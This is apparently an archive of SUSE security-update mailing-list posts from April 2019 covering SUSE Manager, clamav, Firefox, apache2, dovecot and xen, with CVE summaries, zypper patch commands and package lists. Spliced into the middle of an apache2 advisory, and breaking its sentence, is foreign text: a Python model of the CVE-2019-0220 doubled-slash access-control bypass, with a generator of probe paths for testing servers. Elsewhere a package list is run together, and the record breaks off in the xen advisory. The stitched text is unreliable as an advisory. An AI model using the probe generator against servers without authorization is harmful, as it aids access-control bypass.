______________________________________________________________________________

An update that solves three vulnerabilities and has 17 fixes is now available.

Description:

This update fixes the following issues:

cobbler:

- Fixes case where distribution detection returns None (bsc#1130658)
- SUSE texmode fix (bsc#1109316)
- Fix for SUSE distribution detection in ISO building (bsc#1123991)

py26-compat-salt:

- Remove arch from name when pkg.list_pkgs is called with 'attr'
  (bsc#1114029)

spacecmd:

- Fix importing state channels using configchannel_import
- Fix getting file info for latest revision (via configchannel_filedetails)

spacewalk-branding:

- Update jquery.timepicker dependency to 1.11.14 to allow parsing the time
  format without depending on the language. (bsc#1119081)

spacewalk-java:

- Fix a problem when cloning public child channels with a private base
  channel (bsc#1124639)
- Keep assigned channels on traditional to minion migration (bsc#1122836)
- Fix "Add Selected to SSM" on System Groups -> systems page (bsc#1121856)
- Disable notification types with 'java.notifications_type_disabled' in
  rhn.conf (bsc#1111910)
- XMLRPC API: Include init.sls in channel file list (bsc#1111191)
- Fix the config channels assignment via SSM (bsc#1117759)

spacewalk-utils:

- Create /etc/rhn with correct ownership to prevent file conflicts

spacewalk-web:

- Fix action scheduler time picker prefill when the server is on "UTC/GMT"
  timezone (bsc#1121195)
- Fix initializing of the datetime picker (bsc#1126862)
- Show feedback messages after using the retry option on the notification
  messages page

subscription-matcher:

- Old style hard bundle merging fix (bsc#1114059)

susemanager:

- Fix creation of bootstrap repositories for SLE12 (no SP) by requiring
  python-setuptools only for SLE12 >= SP1 (bsc#1129765)
- Add `python-setuptools` package dependency to SLES12 bootstrap repo
  (bsc#1119964)
- Rhnlib was renamed to python2-rhnlib. Change bootstrap data accordingly.

susemanager-schema:

- Fix performance regression in inter-server-sync (bsc#1128781)

susemanager-docs_en:

- Update text and image files
- 2.1 comparison: clarify profile syncing support
- Adjust documentation about notification settings
- Fix internal link (SMT documentation).
- Remove documentation about the "mgr-sync enable-scc" subcommand. This
  subcommand is no longer available.

susemanager-frontend-libs:

- Update jquery.timepicker to 1.11.14 (bsc#1119081)

tika-core:

- New upstream version (1.20). Fixes infinite loop in SQLite3Parser
  (CVE-2018-17197) (bsc#1121038)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Manager Server 3.1:

  zypper in -t patch SUSE-SUSE-Manager-Server-3.1-2019-863=1

- SUSE Manager Proxy 3.1:

  zypper in -t patch SUSE-SUSE-Manager-Proxy-3.1-2019-863=1

Package List:

- SUSE Manager Server 3.1 (ppc64le s390x x86_64):

  spacewalk-branding-2.7.2.17-2.31.3
  susemanager-3.1.19-2.34.2
  susemanager-tools-3.1.19-2.34.2

- SUSE Manager Server 3.1 (noarch):

  cobbler-2.6.6-5.25.1
  py26-compat-salt-2016.11.10-1.19.3
  spacecmd-2.7.8.15-2.32.1
  spacewalk-base-2.7.1.21-2.35.1
  spacewalk-base-minimal-2.7.1.21-2.35.1
  spacewalk-base-minimal-config-2.7.1.21-2.35.1
  spacewalk-html-2.7.1.21-2.35.1
  spacewalk-java-2.7.46.19-2.41.3
  spacewalk-java-config-2.7.46.19-2.41.3
  spacewalk-java-lib-2.7.46.19-2.41.3
  spacewalk-java-oracle-2.7.46.19-2.41.3
  spacewalk-java-postgresql-2.7.46.19-2.41.3
  spacewalk-taskomatic-2.7.46.19-2.41.3
  spacewalk-utils-2.7.10.11-2.23.3
  subscription-matcher-0.22-4.9.2
  susemanager-advanced-topics_en-pdf-3.1-10.29.4
  susemanager-best-practices_en-pdf-3.1-10.29.4
  susemanager-docs_en-3.1-10.29.4
  susemanager-frontend-libs-3.1.2-3.10.1
  susemanager-getting-started_en-pdf-3.1-10.29.4
  susemanager-jsp_en-3.1-10.29.4
  susemanager-reference_en-pdf-3.1-10.29.4
  susemanager-schema-3.1.21-2.36.1
  tika-core-1.20-1.6.2

- SUSE Manager Proxy 3.1 (noarch):

  spacewalk-base-minimal-2.7.1.21-2.35.1
  spacewalk-base-minimal-config-2.7.1.21-2.35.1

References:

https://www.suse.com/security/cve/CVE-2018-10851.html
https://www.suse.com/security/cve/CVE-2018-14626.html
https://www.suse.com/security/cve/CVE-2018-17197.html
https://bugzilla.suse.com/1109316
https://bugzilla.suse.com/1111191
https://bugzilla.suse.com/1111910
https://bugzilla.suse.com/1114029
https://bugzilla.suse.com/1114059
https://bugzilla.suse.com/1114157
https://bugzilla.suse.com/1114169
https://bugzilla.suse.com/1117759
https://bugzilla.suse.com/1119081
https://bugzilla.suse.com/1119964
https://bugzilla.suse.com/1121038
https://bugzilla.suse.com/1121195
https://bugzilla.suse.com/1121856
https://bugzilla.suse.com/1122836
https://bugzilla.suse.com/1123991
https://bugzilla.suse.com/1124639
https://bugzilla.suse.com/1126862
https://bugzilla.suse.com/1128781
https://bugzilla.suse.com/1129765
https://bugzilla.suse.com/1130658

From sle-security-updates at lists.suse.com  Wed Apr 3 16:19:36 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 4 Apr 2019 00:19:36 +0200 (CEST)
Subject: SUSE-SU-2019:0861-1: important: Security update for clamav
Message-ID: <20190403221936.027C7FF2D@maintenance.suse.de>

SUSE Security Update: Security update for clamav
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0861-1
Rating:             important
References:         #1130721
Cross-References:   CVE-2019-1787 CVE-2019-1788 CVE-2019-1789
Affected Products:
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

An update that fixes three vulnerabilities is now available.

Description:

This update for clamav to version 0.100.3 fixes the following issues:

Security issues fixed (bsc#1130721):

- CVE-2019-1787: Fixed an out-of-bounds heap read condition which may occur
  when scanning PDF documents.
- CVE-2019-1789: Fixed an out-of-bounds heap read condition which may occur
  when scanning PE files (i.e. Windows EXE and DLL files).
- CVE-2019-1788: Fixed an out-of-bounds heap write condition which may occur
  when scanning OLE2 files such as Microsoft Office 97-2003 documents.

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Basesystem 15:

  zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-861=1

Package List:

- SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

  clamav-0.100.3-3.9.1
  clamav-debuginfo-0.100.3-3.9.1
  clamav-debugsource-0.100.3-3.9.1
  clamav-devel-0.100.3-3.9.1
  libclamav7-0.100.3-3.9.1
  libclamav7-debuginfo-0.100.3-3.9.1
  libclammspack0-0.100.3-3.9.1
  libclammspack0-debuginfo-0.100.3-3.9.1

References:

https://www.suse.com/security/cve/CVE-2019-1787.html
https://www.suse.com/security/cve/CVE-2019-1788.html
https://www.suse.com/security/cve/CVE-2019-1789.html
https://bugzilla.suse.com/1130721

From sle-security-updates at lists.suse.com  Thu Apr 4 10:11:00 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 4 Apr 2019 18:11:00 +0200 (CEST)
Subject: SUSE-SU-2019:0871-1: important: Security update for MozillaFirefox
Message-ID: <20190404161100.59F9C10125@maintenance.suse.de>

SUSE Security Update: Security update for MozillaFirefox
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0871-1
Rating:             important
References:         #1125330 #1127987 #1129821 #1130262
Cross-References:   CVE-2018-18335 CVE-2018-18356 CVE-2018-18506 CVE-2019-5785
                    CVE-2019-9788 CVE-2019-9790 CVE-2019-9791 CVE-2019-9792
                    CVE-2019-9793 CVE-2019-9794 CVE-2019-9795 CVE-2019-9796
                    CVE-2019-9801 CVE-2019-9810 CVE-2019-9813
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Desktop Applications 15
______________________________________________________________________________

An update that fixes 15 vulnerabilities is now available.
Description:

This update for MozillaFirefox to version ESR 60.6.1 fixes the following
issues:

Security issues addressed:

- Update to Firefox ESR 60.6.1 (bsc#1130262):
  - CVE-2019-9813: Fixed IonMonkey type confusion with __proto__ mutations
  - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information
- Update to Firefox ESR 60.6 (bsc#1129821):
  - CVE-2018-18506: Fixed an issue with Proxy Auto-Configuration file
  - CVE-2019-9801: Fixed an issue which could allow Windows programs to be
    exposed to web content
  - CVE-2019-9788: Fixed multiple memory safety bugs
  - CVE-2019-9790: Fixed a use-after-free vulnerability when removing in-use
    DOM elements
  - CVE-2019-9791: Fixed incorrect type inference for constructors entered
    through on-stack replacement with IonMonkey
  - CVE-2019-9792: Fixed an issue where IonMonkey leaks the JS_OPTIMIZED_OUT
    magic value to script
  - CVE-2019-9793: Fixed multiple improper bounds checks when Spectre
    mitigations are disabled
  - CVE-2019-9794: Fixed an issue where command line arguments were not
    discarded during execution
  - CVE-2019-9795: Fixed a type-confusion vulnerability in the IonMonkey JIT
    compiler
  - CVE-2019-9796: Fixed a use-after-free vulnerability in the SMIL animation
    controller
- Update to Firefox ESR 60.5.1 (bsc#1125330):
  - CVE-2018-18356: Fixed a use-after-free vulnerability in the Skia library
    which can occur when creating a path, leading to a potentially
    exploitable crash.
  - CVE-2019-5785: Fixed an integer overflow vulnerability in the Skia
    library which can occur after specific transform operations, leading to
    a potentially exploitable crash.
  - CVE-2018-18335: Fixed a buffer overflow vulnerability in the Skia library
    which can occur with Canvas 2D acceleration on macOS. This issue was
    addressed by disabling Canvas 2D acceleration in Firefox ESR. Note: this
    does not affect other versions and platforms where Canvas 2D
    acceleration is already disabled by default.
Other issue addressed:

- Fixed an issue with MozillaFirefox-translations-common which was causing an error on update (bsc#1127987).

Release notes:
https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/
https://www.mozilla.org/en-US/security/advisories/mfsa2019-08/
https://www.mozilla.org/en-US/security/advisories/mfsa2019-05/

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:
  zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-871=1
- SUSE Linux Enterprise Module for Desktop Applications 15:
  zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-871=1

Package List:

- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):
  MozillaFirefox-branding-upstream-60.6.1-3.29.3
  MozillaFirefox-debuginfo-60.6.1-3.29.3
  MozillaFirefox-debugsource-60.6.1-3.29.3
- SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):
  MozillaFirefox-60.6.1-3.29.3
  MozillaFirefox-debuginfo-60.6.1-3.29.3
  MozillaFirefox-debugsource-60.6.1-3.29.3
  MozillaFirefox-devel-60.6.1-3.29.3
  MozillaFirefox-translations-common-60.6.1-3.29.3
  MozillaFirefox-translations-other-60.6.1-3.29.3

References:
https://www.suse.com/security/cve/CVE-2018-18335.html
https://www.suse.com/security/cve/CVE-2018-18356.html
https://www.suse.com/security/cve/CVE-2018-18506.html
https://www.suse.com/security/cve/CVE-2019-5785.html
https://www.suse.com/security/cve/CVE-2019-9788.html
https://www.suse.com/security/cve/CVE-2019-9790.html
https://www.suse.com/security/cve/CVE-2019-9791.html
https://www.suse.com/security/cve/CVE-2019-9792.html
https://www.suse.com/security/cve/CVE-2019-9793.html
https://www.suse.com/security/cve/CVE-2019-9794.html
https://www.suse.com/security/cve/CVE-2019-9795.html
https://www.suse.com/security/cve/CVE-2019-9796.html
https://www.suse.com/security/cve/CVE-2019-9801.html
https://www.suse.com/security/cve/CVE-2019-9810.html
https://www.suse.com/security/cve/CVE-2019-9813.html
https://bugzilla.suse.com/1125330
https://bugzilla.suse.com/1127987
https://bugzilla.suse.com/1129821
https://bugzilla.suse.com/1130262

From sle-security-updates at lists.suse.com Thu Apr 4 16:10:03 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 00:10:03 +0200 (CEST)
Subject: SUSE-SU-2019:0873-1: important: Security update for apache2
Message-ID: <20190404221003.422B3FF2D@maintenance.suse.de>

SUSE Security Update: Security update for apache2
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0873-1
Rating: important
References: #1131233 #1131237 #1131239 #1131241 #1131245
Cross-References: CVE-2019-0196 CVE-2019-0197 CVE-2019-0211 CVE-2019-0217 CVE-2019-0220
Affected Products:
  SUSE Linux Enterprise Module for Server Applications 15
  SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
______________________________________________________________________________

An update that fixes 5 vulnerabilities is now available.

Description:

This update for apache2 fixes the following issues:

* CVE-2019-0211: A flaw in the Apache HTTP Server allowed less-privileged child processes or threads to execute arbitrary code with the privileges of the parent process. Attackers with control over CGI scripts or extension modules run by the server could have abused this issue to potentially gain super user privileges. [bsc#1131233]
* CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to bypass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241]
* CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239]
* CVE-2019-0197: When HTTP/2 support was enabled in the Apache server for an 'http' host, or H2Upgrade was enabled for h2 on an 'https' host, an Upgrade request from http/1.1 to http/2 that was not the first request on a connection could lead to a misconfiguration and crash. This issue could have been abused to mount a denial-of-service attack. Servers that never enabled the h2 protocol, or that only enabled it for https: and did not configure "H2Upgrade on", are unaffected. [bsc#1131245]
* CVE-2019-0196: Through specially crafted network input, Apache's http/2 request handler could be led to access previously freed memory while determining the method of a request. This resulted in the request being misclassified and thus being processed incorrectly. [bsc#1131237]

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
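The CVE-2019-0220 entry above describes an inconsistency rather than a single bug: one component matches access rules against the request path as sent, another collapses consecutive slashes before mapping the path to the filesystem. The Python model below is an added illustration of that mismatch, not code from Apache httpd or from SUSE. The regex rule `^/admin(/|$)` (standing in for a regex-based location rule), the document root `/srv/www/htdocs` and the request paths are constructed assumptions. It shows the doubled-slash variant that the raw-path check lets through, shows that normalizing before the check removes the bypass, and includes the small variant generator a tester would use, with authorization, to probe a real server for the same mismatch.

```python
import re

# Added illustration of the CVE-2019-0220 description above. This is a model,
# not Apache httpd code: one path-matching rule sees the request path exactly
# as sent, while the filesystem mapping collapses consecutive slashes. The rule,
# the document root and the request paths are constructed for the example.

DOCUMENT_ROOT = "/srv/www/htdocs"                 # assumed document root
PROTECTED_RULE = re.compile(r"^/admin(/|$)")      # stands in for a regex-based location rule


def collapse_slashes(path: str) -> str:
    """Merge every run of two or more '/' into a single '/'."""
    return re.sub(r"/{2,}", "/", path)


def protected_raw(path: str) -> bool:
    """Vulnerable variant: the rule is applied to the unnormalized path."""
    return PROTECTED_RULE.match(path) is not None


def protected_normalized(path: str) -> bool:
    """Fixed variant: normalize first, then apply the same rule."""
    return PROTECTED_RULE.match(collapse_slashes(path)) is not None


def dispatch(path: str, check) -> tuple:
    """Model one request: ('denied', None) or ('served', filesystem path).

    The filesystem mapping collapses slashes no matter which access check
    is in use; that asymmetry is the inconsistency being modelled.
    """
    if check(path):
        return ("denied", None)
    return ("served", DOCUMENT_ROOT + collapse_slashes(path))


def slash_variants(path: str) -> list:
    """All variants of a path with exactly one '/' doubled: the probe set a
    tester would send (with authorization) to look for normalization mismatches."""
    return [path[:i] + "/" + path[i:] for i, ch in enumerate(path) if ch == "/"]


def bypasses(path: str, check) -> list:
    """Variants of a path that is denied as sent but served after doubling a slash."""
    if dispatch(path, check)[0] != "denied":
        raise ValueError("baseline path must be denied for a bypass test to mean anything")
    return [v for v in slash_variants(path) if dispatch(v, check)[0] == "served"]


if __name__ == "__main__":
    target = "/admin/secret"
    print("vulnerable check lets through:", bypasses(target, protected_raw))
    print("normalized check lets through:", bypasses(target, protected_normalized))
```

Only the variant that breaks the anchor of the rule (`//admin/secret`) is served by the raw check; `/admin//secret` still matches `^/admin/` and is denied either way, which is why probing every slash position rather than only the first one is worth the extra requests.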
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Server Applications 15:
  zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-873=1
- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:
  zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-873=1

Package List:

- SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64):
  apache2-2.4.33-3.15.1
  apache2-debuginfo-2.4.33-3.15.1
  apache2-debugsource-2.4.33-3.15.1
  apache2-devel-2.4.33-3.15.1
  apache2-prefork-2.4.33-3.15.1
  apache2-prefork-debuginfo-2.4.33-3.15.1
  apache2-utils-2.4.33-3.15.1
  apache2-utils-debuginfo-2.4.33-3.15.1
  apache2-worker-2.4.33-3.15.1
  apache2-worker-debuginfo-2.4.33-3.15.1
- SUSE Linux Enterprise Module for Server Applications 15 (noarch):
  apache2-doc-2.4.33-3.15.1
- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):
  apache2-debuginfo-2.4.33-3.15.1
  apache2-debugsource-2.4.33-3.15.1
  apache2-event-2.4.33-3.15.1
  apache2-event-debuginfo-2.4.33-3.15.1
  apache2-example-pages-2.4.33-3.15.1

References:
https://www.suse.com/security/cve/CVE-2019-0196.html
https://www.suse.com/security/cve/CVE-2019-0197.html
https://www.suse.com/security/cve/CVE-2019-0211.html
https://www.suse.com/security/cve/CVE-2019-0217.html
https://www.suse.com/security/cve/CVE-2019-0220.html
https://bugzilla.suse.com/1131233
https://bugzilla.suse.com/1131237
https://bugzilla.suse.com/1131239
https://bugzilla.suse.com/1131241
https://bugzilla.suse.com/1131245

From sle-security-updates at lists.suse.com Thu Apr 4 16:15:52 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 00:15:52 +0200 (CEST)
Subject: SUSE-SU-2019:0878-1: important: Security update for apache2
Message-ID: <20190404221552.D97B4FF2D@maintenance.suse.de>

SUSE Security Update: Security update for apache2
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0878-1
Rating: important
References: #1131233 #1131237 #1131239 #1131241 #1131245
Cross-References: CVE-2019-0196 CVE-2019-0197 CVE-2019-0211 CVE-2019-0217 CVE-2019-0220
Affected Products:
  SUSE OpenStack Cloud 7
  SUSE Linux Enterprise Software Development Kit 12-SP4
  SUSE Linux Enterprise Software Development Kit 12-SP3
  SUSE Linux Enterprise Server for SAP 12-SP2
  SUSE Linux Enterprise Server 12-SP4
  SUSE Linux Enterprise Server 12-SP3
  SUSE Linux Enterprise Server 12-SP2-LTSS
  SUSE Linux Enterprise Server 12-SP2-BCL
  SUSE Enterprise Storage 4
______________________________________________________________________________

An update that fixes 5 vulnerabilities is now available.

Description:

This update for apache2 fixes the following issues:

* CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to bypass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241]
* CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239]
* CVE-2019-0211: A flaw in the Apache HTTP Server allowed less-privileged child processes or threads to execute arbitrary code with the privileges of the parent process. Attackers with control over CGI scripts or extension modules run by the server could have abused this issue to potentially gain super user privileges. [bsc#1131233]
* CVE-2019-0197: When HTTP/2 support was enabled in the Apache server for an 'http' host, or H2Upgrade was enabled for h2 on an 'https' host, an Upgrade request from http/1.1 to http/2 that was not the first request on a connection could lead to a misconfiguration and crash. This issue could have been abused to mount a denial-of-service attack. Servers that never enabled the h2 protocol, or that only enabled it for https: and did not configure "H2Upgrade on", are unaffected. [bsc#1131245]
* CVE-2019-0196: Through specially crafted network input, Apache's http/2 request handler could be led to access previously freed memory while determining the method of a request. This resulted in the request being misclassified and thus being processed incorrectly. [bsc#1131237]

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE OpenStack Cloud 7:
  zypper in -t patch SUSE-OpenStack-Cloud-7-2019-878=1
- SUSE Linux Enterprise Software Development Kit 12-SP4:
  zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-878=1
- SUSE Linux Enterprise Software Development Kit 12-SP3:
  zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-878=1
- SUSE Linux Enterprise Server for SAP 12-SP2:
  zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-878=1
- SUSE Linux Enterprise Server 12-SP4:
  zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-878=1
- SUSE Linux Enterprise Server 12-SP3:
  zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-878=1
- SUSE Linux Enterprise Server 12-SP2-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-878=1
- SUSE Linux Enterprise Server 12-SP2-BCL:
  zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-878=1
- SUSE Enterprise Storage 4:
  zypper in -t patch SUSE-Storage-4-2019-878=1

Package List:

- SUSE OpenStack Cloud 7 (s390x x86_64):
  apache2-2.4.23-29.40.1
  apache2-debuginfo-2.4.23-29.40.1
  apache2-debugsource-2.4.23-29.40.1
apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE OpenStack Cloud 7 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-devel-2.4.23-29.40.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-devel-2.4.23-29.40.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP4 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 
apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP3 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP2-BCL (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Enterprise Storage 4 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Enterprise Storage 4 (x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 References: https://www.suse.com/security/cve/CVE-2019-0196.html https://www.suse.com/security/cve/CVE-2019-0197.html https://www.suse.com/security/cve/CVE-2019-0211.html https://www.suse.com/security/cve/CVE-2019-0217.html https://www.suse.com/security/cve/CVE-2019-0220.html https://bugzilla.suse.com/1131233 https://bugzilla.suse.com/1131237 https://bugzilla.suse.com/1131239 https://bugzilla.suse.com/1131241 https://bugzilla.suse.com/1131245 From 
sle-security-updates at lists.suse.com Thu Apr 4 16:20:47 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 00:20:47 +0200 (CEST)
Subject: SUSE-SU-2019:0876-1: moderate: Security update for dovecot23
Message-ID: <20190404222047.E57D2FF2D@maintenance.suse.de>

SUSE Security Update: Security update for dovecot23
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0876-1
Rating: moderate
References: #1130116
Cross-References: CVE-2019-7524
Affected Products:
  SUSE Linux Enterprise Module for Server Applications 15
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for dovecot23 fixes the following issue:

Security issue fixed:

- CVE-2019-7524: Fixed improper file handling which could result in a stack overflow, allowing local root escalation (bsc#1130116).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Server Applications 15:
  zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-876=1

Package List:

- SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64):
  dovecot23-2.3.3-4.10.1
  dovecot23-backend-mysql-2.3.3-4.10.1
  dovecot23-backend-mysql-debuginfo-2.3.3-4.10.1
  dovecot23-backend-pgsql-2.3.3-4.10.1
  dovecot23-backend-pgsql-debuginfo-2.3.3-4.10.1
  dovecot23-backend-sqlite-2.3.3-4.10.1
  dovecot23-backend-sqlite-debuginfo-2.3.3-4.10.1
  dovecot23-debuginfo-2.3.3-4.10.1
  dovecot23-debugsource-2.3.3-4.10.1
  dovecot23-devel-2.3.3-4.10.1
  dovecot23-fts-2.3.3-4.10.1
  dovecot23-fts-debuginfo-2.3.3-4.10.1
  dovecot23-fts-lucene-2.3.3-4.10.1
  dovecot23-fts-lucene-debuginfo-2.3.3-4.10.1
  dovecot23-fts-solr-2.3.3-4.10.1
  dovecot23-fts-solr-debuginfo-2.3.3-4.10.1
  dovecot23-fts-squat-2.3.3-4.10.1
  dovecot23-fts-squat-debuginfo-2.3.3-4.10.1

References:
https://www.suse.com/security/cve/CVE-2019-7524.html
https://bugzilla.suse.com/1130116

From sle-security-updates at lists.suse.com Thu Apr 4 16:21:30 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 00:21:30 +0200 (CEST)
Subject: SUSE-SU-2019:0875-1: important: Recommended update for xen
Message-ID: <20190404222130.0186AFF2D@maintenance.suse.de>

SUSE Security Update: Recommended update for xen
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0875-1
Rating: important
References: #1026236 #1027519 #1114988 #1126140 #1126141 #1126192 #1126195 #1126196 #1126197 #1126198 #1126201 #1126325 #1127400 #1127620
Cross-References: CVE-2018-19967
Affected Products:
  SUSE Linux Enterprise Module for Server Applications 15
  SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

An update that solves one vulnerability and has 13 fixes is
now available.

Description:

This update for xen fixes the following issues:

Security issues fixed:

- CVE-2018-19967: Fixed an issue where HLE constructs allowed guests to lock up the host, resulting in a Denial of Service (DoS) (XSA-282) (bsc#1114988).
- Fixed an issue which could allow malicious PV guests to cause a host crash or gain access to data pertaining to other guests. Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198).
